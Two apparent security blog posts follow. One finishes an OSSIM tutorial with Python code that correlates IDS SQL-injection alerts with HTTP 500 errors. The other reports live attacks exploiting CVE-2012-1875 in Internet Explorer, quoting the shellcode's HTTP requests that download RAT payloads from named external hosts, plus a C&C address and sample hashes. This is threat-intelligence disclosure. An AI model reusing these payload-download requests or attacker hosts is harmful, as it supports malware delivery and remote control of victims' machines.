Now you are done; remember to edit the XML file as we did in the previous example and add type="detector" to both rule levels:
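The two-level directive built in Example 2 is, at its core, a small stateful correlation: a level-1 event opens an instance pinned to its source/destination pair, and the instance fires when a level-2 event from the same pair arrives within the timeout (10 seconds here) the required number of times (1 occurrence), yielding an alarm at the configured reliability (8). The following is an added example, not OSSIM's engine or directive format: a minimal Python model of that logic, run over constructed events. The event field names (source, category, subcategory, status), the level-1 reliability and the directive priority are assumptions chosen for the demo; the timeout, occurrence and level-2 reliability values are the ones set above.

```python
"""Minimal two-level correlation directive modelled on Example 2:
level 1 = IDS SQL-injection event, level 2 = HTTP 500 from the same src/dst
within 10 seconds. Added example, not OSSIM code. Events are constructed dicts.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

Event = Dict[str, object]


@dataclass
class Level:
    name: str
    matches: Callable[[Event], bool]
    reliability: int
    occurrence: int = 1               # events of this level needed before advancing
    timeout: Optional[float] = None   # seconds allowed after the previous level matched


@dataclass
class Instance:
    """One in-progress directive instance, pinned to the src/dst of its level-1 event."""
    src: str
    dst: str
    started: float
    level_idx: int = 1                # index of the next level to satisfy
    seen: int = 0                     # occurrences collected for that level so far
    events: List[Event] = field(default_factory=list)


@dataclass
class Directive:
    name: str
    priority: int
    levels: List[Level]
    instances: List[Instance] = field(default_factory=list)
    alarms: List[dict] = field(default_factory=list)

    def feed(self, ev: Event) -> List[dict]:
        """Process one event (needs ts, src, dst); return the alarms it triggered."""
        fired, survivors = [], []
        for inst in self.instances:
            lvl = self.levels[inst.level_idx]
            if ev["ts"] - inst.started > lvl.timeout:
                continue                                  # window expired: drop instance
            if ev["src"] == inst.src and ev["dst"] == inst.dst and lvl.matches(ev):
                inst.seen += 1
                inst.events.append(ev)
                if inst.seen >= lvl.occurrence:
                    inst.level_idx += 1
                    inst.seen = 0
                    inst.started = ev["ts"]               # next level's timeout counts from here
                    if inst.level_idx == len(self.levels):
                        fired.append({"directive": self.name, "priority": self.priority,
                                      "reliability": lvl.reliability, "src": inst.src,
                                      "dst": inst.dst, "events": list(inst.events)})
                        continue                          # completed: not kept
            survivors.append(inst)
        if self.levels[0].matches(ev):                    # every level-1 hit opens an instance
            survivors.append(Instance(ev["src"], ev["dst"], ev["ts"], events=[ev]))
        self.instances = survivors
        self.alarms.extend(fired)
        return fired


def sqli_then_500() -> Directive:
    # ASSUMPTIONS: taxonomy labels, level-1 reliability and priority are demo values.
    return Directive(
        name="SQL injection followed by error 500", priority=5,
        levels=[
            Level("IDS SQL injection",
                  lambda e: e["source"] == "ids" and e["category"] == "Exploit"
                  and e["subcategory"] == "SQL_injection", reliability=3),
            Level("HTTP 500 on web server",
                  lambda e: e["source"] == "webserver" and e.get("status") == 500,
                  reliability=8, occurrence=1, timeout=10),
        ])


# Constructed events: one attack that completes, one whose 500 arrives too late,
# and a stray 500 with no preceding IDS event.
DEMO_EVENTS = [
    {"ts": 0.0, "src": "198.51.100.20", "dst": "10.0.0.5", "source": "ids",
     "category": "Exploit", "subcategory": "SQL_injection"},
    {"ts": 2.5, "src": "198.51.100.20", "dst": "10.0.0.5", "source": "webserver", "status": 500},
    {"ts": 30.0, "src": "203.0.113.8", "dst": "10.0.0.5", "source": "ids",
     "category": "Exploit", "subcategory": "SQL_injection"},
    {"ts": 45.0, "src": "203.0.113.8", "dst": "10.0.0.5", "source": "webserver", "status": 500},
    {"ts": 50.0, "src": "203.0.113.9", "dst": "10.0.0.5", "source": "webserver", "status": 500},
]


def run_demo(events=DEMO_EVENTS) -> List[dict]:
    d = sqli_then_500()
    for ev in events:
        d.feed(ev)
    return d.alarms


if __name__ == "__main__":
    for alarm in run_demo():
        print(alarm["directive"], alarm["src"], "->", alarm["dst"], "reliability", alarm["reliability"])
```

The second attacker's 500 arrives 15 seconds after its IDS event, so the instance has expired and no alarm is raised; lowering the false-positive rate versus a bare IDS signature is exactly what the timeout and the src/dst pinning buy you.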

[Screenshot: XML directive with type="detector" on both rule levels]

Enjoy it! Remember, if you have any comments or doubts, feel free to ask in our brand new AlienVault OSSIM Forum.

jaime.blasco

Ongoing attacks exploiting CVE-2012-1875

June 13th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | IP Reputation | Malware

Yesterday, Microsoft released the June 2012 Black Tuesday Update, including patches for a vulnerability affecting a wide range of versions of Internet Explorer. The exploit works across different Windows versions ranging from XP to Windows 7.

The 0day has been actively exploited, as reported by McAfee.

We have been able to find several servers hosting similar versions of the exploit. One of them was detected by our OTX system a couple of days ago:

http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=113.10.241.239

The exploit supports a wide range of languages and Windows versions and seems to be very reliable.

[Screenshot: supported languages and Windows versions]

The exploit includes return-oriented programming (ROP) techniques that help bypass OS protections.

[Screenshot: ROP code in the exploit]

The shellcode downloads the payload from the following URL:

GET /javaw.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 113.10.241.239
Connection: Keep-Alive

https://www.virustotal.com/file/705cf0c95f7f0d351d480df4b48f723c7f72ce4e16b14a3a52f99081707e5a32/analysis/

[Screenshot: VirusTotal analysis]

A couple of days ago the AV detection rate was 3/41.

Other versions of the exploit have been found in different servers requesting the following payloads:

GET /english/cala.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: 140.109.236.143
Connection: Keep-Alive

and

GET /img/books.cab HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)
Host: www.villagXXXX
Connection: Keep-Alive

https://www.virustotal.com/file/1581c0555956f7f62c717e303b6f8785207f107fbb4e375c1e50788d9a4a2f07/analysis/

[Screenshot: VirusTotal analysis]

The payloads seem to be RATs (Remote Access Tools).

The C&C server for that RAT is online (IP address 219.90.117.132):

219.90.117.128 – 219.90.117.159
China Shenzhen Soul Tech Co. Ltd

We will release more information as soon as we analyze the components involved in this attack.

jaime.blasco